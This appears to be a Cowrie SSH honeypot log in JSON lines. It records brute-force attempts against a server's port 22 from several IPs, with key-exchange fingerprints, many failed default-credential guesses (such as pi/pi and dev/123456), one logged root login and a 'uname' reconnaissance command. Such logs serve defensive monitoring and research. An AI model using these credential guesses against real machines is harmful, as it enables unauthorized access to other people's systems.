{"eventid":"cowrie.login.failed","username":"dev","password":"123456","message":"login attempt [dev/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:45:41.637477Z","src_ip":"45.125.211.194","session":"7c18114f858b"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:45:42.848675Z","src_ip":"45.125.211.194","session":"7c18114f858b"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":13764,"dst_ip":"1.2.3.4","dst_port":22,"session":"26f08c6c7496","protocol":"ssh","message":"New connection: 45.125.211.194:13764 (1.2.3.4:22) [session: 26f08c6c7496]","sensor":"my-vps","timestamp":"2025-08-28T03:45:54.990377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:45:54.991234Z","src_ip":"45.125.211.194","session":"26f08c6c7496"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:45:55.202521Z","src_ip":"45.125.211.194","session":"26f08c6c7496"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"123456","message":"login attempt [oscar/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:45:55.829504Z","src_ip":"45.125.211.194","session":"26f08c6c7496"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:45:57.039459Z","src_ip":"45.125.211.194","session":"26f08c6c7496"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":9669,"dst_ip":"1.2.3.4","dst_port":22,"session":"6b995c91ba8e","protocol":"ssh","message":"New connection: 45.125.211.194:9669 (1.2.3.4:22) [session: 6b995c91ba8e]","sensor":"my-vps","timestamp":"2025-08-28T03:46:09.955045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:46:09.968347Z","src_ip":"45.125.211.194","session":"6b995c91ba8e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:46:10.168538Z","src_ip":"45.125.211.194","session":"6b995c91ba8e"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"dolphinscheduler123","message":"login attempt [dolphinscheduler/dolphinscheduler123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:46:10.996856Z","src_ip":"45.125.211.194","session":"6b995c91ba8e"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:46:12.207402Z","src_ip":"45.125.211.194","session":"6b995c91ba8e"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":56754,"dst_ip":"1.2.3.4","dst_port":22,"session":"85913a02c561","protocol":"ssh","message":"New connection: 45.125.211.194:56754 (1.2.3.4:22) [session: 85913a02c561]","sensor":"my-vps","timestamp":"2025-08-28T03:46:24.723161Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:46:24.735636Z","src_ip":"45.125.211.194","session":"85913a02c561"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:46:24.931622Z","src_ip":"45.125.211.194","session":"85913a02c561"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-28T03:46:25.763368Z","src_ip":"45.125.211.194","session":"85913a02c561"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:46:26.973568Z","src_ip":"45.125.211.194","session":"85913a02c561"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":18434,"dst_ip":"1.2.3.4","dst_port":22,"session":"655f950eb143","protocol":"ssh","message":"New connection: 45.125.211.194:18434 (1.2.3.4:22) [session: 655f950eb143]","sensor":"my-vps","timestamp":"2025-08-28T03:46:39.668640Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:46:39.686271Z","src_ip":"45.125.211.194","session":"655f950eb143"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:46:39.936555Z","src_ip":"45.125.211.194","session":"655f950eb143"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev","message":"login attempt [dev/dev] failed","sensor":"my-vps","timestamp":"2025-08-28T03:46:40.783856Z","src_ip":"45.125.211.194","session":"655f950eb143"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:46:42.007653Z","src_ip":"45.125.211.194","session":"655f950eb143"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43936,"dst_ip":"1.2.3.4","dst_port":22,"session":"227fb6ae385c","protocol":"ssh","message":"New connection: 212.227.235.229:43936 (1.2.3.4:22) [session: 227fb6ae385c]","sensor":"my-vps","timestamp":"2025-08-28T03:46:49.200893Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:46:49.201976Z","src_ip":"212.227.235.229","session":"227fb6ae385c"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T03:46:49.306452Z","src_ip":"212.227.235.229","session":"227fb6ae385c"}
{"eventid":"cowrie.login.failed","username":"clay","password":"clay1234","message":"login attempt [clay/clay1234] failed","sensor":"my-vps","timestamp":"2025-08-28T03:46:49.625202Z","src_ip":"212.227.235.229","session":"227fb6ae385c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:46:50.732972Z","src_ip":"212.227.235.229","session":"227fb6ae385c"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":37558,"dst_ip":"1.2.3.4","dst_port":22,"session":"bef09731c8fd","protocol":"ssh","message":"New connection: 194.233.79.134:37558 (1.2.3.4:22) [session: bef09731c8fd]","sensor":"my-vps","timestamp":"2025-08-28T03:46:52.047561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:46:52.048271Z","src_ip":"194.233.79.134","session":"bef09731c8fd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:46:52.657772Z","src_ip":"194.233.79.134","session":"bef09731c8fd"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456","message":"login attempt [root/aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:46:53.782027Z","src_ip":"194.233.79.134","session":"bef09731c8fd"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":55828,"dst_ip":"1.2.3.4","dst_port":22,"session":"dacd3bf04760","protocol":"ssh","message":"New connection: 45.125.211.194:55828 (1.2.3.4:22) [session: dacd3bf04760]","sensor":"my-vps","timestamp":"2025-08-28T03:46:54.427661Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:46:54.539984Z","src_ip":"194.233.79.134","session":"bef09731c8fd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:46:54.540749Z","src_ip":"194.233.79.134","session":"bef09731c8fd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:46:54.541945Z","src_ip":"45.125.211.194","session":"dacd3bf04760"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:46:54.647569Z","src_ip":"45.125.211.194","session":"dacd3bf04760"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:46:54.714911Z","src_ip":"194.233.79.134","session":"bef09731c8fd"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:46:54.716130Z","src_ip":"194.233.79.134","session":"bef09731c8fd"}
{"eventid":"cowrie.login.failed","username":"oceanbase","password":"oceanbase","message":"login attempt [oceanbase/oceanbase] failed","sensor":"my-vps","timestamp":"2025-08-28T03:46:55.477050Z","src_ip":"45.125.211.194","session":"dacd3bf04760"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:46:56.688945Z","src_ip":"45.125.211.194","session":"dacd3bf04760"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":22577,"dst_ip":"1.2.3.4","dst_port":22,"session":"7fd34bf78e85","protocol":"ssh","message":"New connection: 45.125.211.194:22577 (1.2.3.4:22) [session: 7fd34bf78e85]","sensor":"my-vps","timestamp":"2025-08-28T03:47:09.327012Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:47:09.337137Z","src_ip":"45.125.211.194","session":"7fd34bf78e85"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:47:09.537796Z","src_ip":"45.125.211.194","session":"7fd34bf78e85"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse","message":"login attempt [lighthouse/lighthouse] failed","sensor":"my-vps","timestamp":"2025-08-28T03:47:10.377694Z","src_ip":"45.125.211.194","session":"7fd34bf78e85"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:47:11.590028Z","src_ip":"45.125.211.194","session":"7fd34bf78e85"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":53930,"dst_ip":"1.2.3.4","dst_port":22,"session":"53a4d33ae348","protocol":"ssh","message":"New connection: 139.19.117.131:53930 (1.2.3.4:22) [session: 53a4d33ae348]","sensor":"my-vps","timestamp":"2025-08-28T03:47:14.631833Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:47:14.632502Z","src_ip":"139.19.117.131","session":"53a4d33ae348"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T03:47:14.650973Z","src_ip":"139.19.117.131","session":"53a4d33ae348"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIHOZv7Y48fd8PViQw8eOnHzHW2ma+L9ATe2qfrvUvEsBgKG5sjQ95gsgbzQzsPvzutkesAuECtD3oj/USIe4eOqyOh/HG1a6MKuflXM3qQUEDaniKYYl2ppofsPdmI5bcgv/lY2ld44CeYIoPnO/FdSUcvNebbIQRkBmbekb+4uSKKOrSdRAuYYAOvLlPYXIcNHWF6pQMfTtqnM3G/hGf2htD0m4N5BuQqV4a5T3nvFnige9wBVCAg2jHOPD4Mx4UGbfG9LaR12rQ9KM0Gv5IDItdV14M81vSshwLBo0EvWYu5WgNoH34xJfRk21U469ve9Ve4AbP4K2Mbo3lSAsH","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 92:53:c2:45:64:14:44:b5:bb:23:e7:0e:f1:43:d2:5f","sensor":"my-vps","timestamp":"2025-08-28T03:47:14.688182Z","src_ip":"139.19.117.131","session":"53a4d33ae348"}
